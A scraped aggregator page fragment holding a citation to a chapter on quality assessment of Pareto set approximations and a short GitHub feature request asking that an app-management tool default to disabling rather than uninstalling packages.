↑ Zitzler, Eckart; Knowles, Joshua; Thiele, Lothar (2008), Quality Assessment of Pareto Set Approximations”, in Branke, Jürgen; Deb, Kalyanmoy; Miettinen, Kaisa; Słowiński, Roman (eds.), Multiobjective Optimization: Interactive and Evolutionary Approaches, Lecture Notes in Computer Science, Berlin, Heidelberg: Springer, pp. 373 – 404, doi:10.1007/​978 – 3-540 – 88908-3_14, ISBN 978 – 3-540 – 88908-3, re­trieved 2021 – 10-08

feat(pkg-state): disable by default

github.com

Describe the fea­ture you want

The Disable mode” (“Freeze” in AppManager) should be the de­fault. Uninstall” causes too much prob­lems

Acknowledgements

This is­sue is not a du­pli­cate of an ex­ist­ing fea­ture re­quest.

I have cho­sen an ap­pro­pri­ate ti­tle.

All re­quested in­for­ma­tion has been pro­vided prop­erly.

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

Visit pancik.com for more.